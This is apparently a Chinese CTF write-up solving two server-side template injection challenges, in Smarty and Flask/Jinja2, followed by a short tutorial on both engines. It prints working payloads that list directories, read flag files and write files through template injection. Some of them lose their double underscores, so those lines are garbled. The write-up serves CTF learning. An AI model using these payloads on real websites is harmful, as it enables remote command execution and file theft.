【无标题】

1.[HDCTF 2023]SearchMaster

他说模板都一样,可能有模板注入,再看后面POST传一个data参数

尝试传参

传1的时候显示1,可能有SSTI注入漏洞,测试一下{{7*7}}

成功的执行了,说明存在SSTI漏洞,但是是什么模板还需要再判断

{{config}}渲染函数看一下

报错了,看报错内容,smarty模板

所以这题是smarty模板的SSTI注入漏洞

尝试命令执行,

构造{{system('ls /')}}查看根目录下的文件

可以看到有一个flag字样的文件,cat命令打开

{{system('cat /flag_13_searchmaster')}}

得到flag

2.[HNCTF 2022 WEEK2]ez_SSTI

还是SSTI注入,但是看了很久没有参数,可能需要爆参数

参数是name,当然也可以用fuzz

传参:?name={{7*7}}

确实是SSTI模板注入漏洞

config渲染函数看一下

出来了这些东西,看不懂不要紧,搜索看一下

可以看到是flask模板

{{"".class.bases[0].subclasses()}}

遍历子目录

可以看到有非常多的函数,但哪个可以使用还需要测试,最终

构造?name={{config.class.init.globals['os'].popen('ls').read()}}

读取读取目录下的文件

再用cat命令读取flag,构造

?name={{config.class.init.globals['os'].popen('cat flag').read()}}

sstiFLASK模板可以看作者给的这个https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#python

总结两个模板,smarty模板和FLASK模板

Smarty是一个PHP的模板引擎,提供让程序逻辑与页面显示(HTML/CSS)代码分离的功能。

Smarty是基于PHP开发的,对于Smarty的SSTI的利用手段与常见的flask的SSTI有很大区别。

一般情况下输入{$smarty.version}就可以看到返回的smarty的版本号。

Smarty支持使用{php}{/php}标签来执行被包裹其中的php指令,最常规的思路自然是先测试该标签。但是在smarty3中表明:Smarty已经废弃{php}标签,强烈建议不要使用。在Smarty 3.1,{php}仅在SmartyBC中可用。不做过多的描述。

Smarty的{if}条件判断和PHP的if非常相似,只是增加了一些特性。每个{if}必须有一个配对的{/if},也可以使用{else} 和 {elseif},全部的PHP条件表达式和函数都可以在if内使用,如||*, or, &&, and, is_array(), 等等,如:{if is_array($array)}{/if}*

{}标签

直接输入php命令例如:{system("ls")}

以下是SSTI注入的常规方法。

可以执行的话箭头是往上走,不可以执行就是往下走,如此便可以判断方法。

FLASK模板

一、flask是用python编写的一个轻量web开发框架

二、flask使用jinjia2渲染引擎进行网页渲染,当处理不得当,未进行语句过滤,用户输入{{控制语句}},会导致渲染出恶意代码,形成注入。

三、flask基础知识:

class 子类

object 父类

object是父子关系的顶端,所有的数据类型最终都是父类object

子类可以调用父类下的其他子类,也就是我做不到的事情找我的父类,我的父类会找能做这件事的子类帮我把这件事做了。

__class__看当前类。假设是A

class.__base__看当前类A的父类B,假设是B

class.base.__base__看B的父类,,,属于层层递进

class.__mor__罗列所有的父类关系

__subclasses__可以调用父类下面的其他子类

init(初始化方法),globals(访问全局变量,字典),通过popen,以及read方法来进行系统命令执行

print('abc'.class.base.subclasses__()[41].init.globals['os']('fl4g').read())

{{''.class.mro[2].subclasses()[71].init.globals['os'].listdir('.')}}

__builtins__下的open进行文件的读取:

{{''.class.mro[1].subclasses()[134].init.globals['builtins']['open']('1.txt').read())}}

通过write() 方式修改文件内容

{{''.class.mro[1].subclasses()[41].init.globals['builtins']['open']('1.txt','w').write('123456')}}

小结:

class 返回类型所属的对象

mro 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。

base 返回该对象所继承的基类 // __base__和__mro__都是用来寻找基类的

subclasses 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表

init 类的初始化方法

globals 对包含函数全局变量的字典的引用

注意{{''.class}},这个payload的单引号可以换成"" [] ()

因为不管他包裹的是什么子类,最终返回的父类都是同一个的。

这样在有些地方被过滤了就可以替换。

__subclasses__后面要跟括号,这样才能被认为是一个函数来被执行.

相关推荐
brrdg_sefg32 分钟前
WEB 漏洞 - 文件包含漏洞深度解析
前端·网络·安全
浏览器爱好者1 小时前
谷歌浏览器的网络安全检测工具介绍
chrome·安全
独行soc2 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍11基于XML的SQL注入(XML-Based SQL Injection)
数据库·安全·web安全·漏洞挖掘·sql注入·hw·xml注入
安全方案5 小时前
如何增强网络安全意识?(附培训PPT资料)
网络·安全·web安全
H4_9Y5 小时前
顶顶通呼叫中心中间件mod_cti模块安全增强,预防盗打风险(mod_cti基于FreeSWITCH)
安全·中间件
Hacker_Oldv6 小时前
网络安全中常用浏览器插件、拓展
安全·web安全
hao_wujing8 小时前
网络安全攻防演练中的常见计策
安全·web安全
燕雀安知鸿鹄之志哉.9 小时前
攻防世界 web ics-06
网络·经验分享·安全·web安全·网络安全
鸭梨山大。10 小时前
Jenkins安全部署规范及安全基线
安全·中间件·jenkins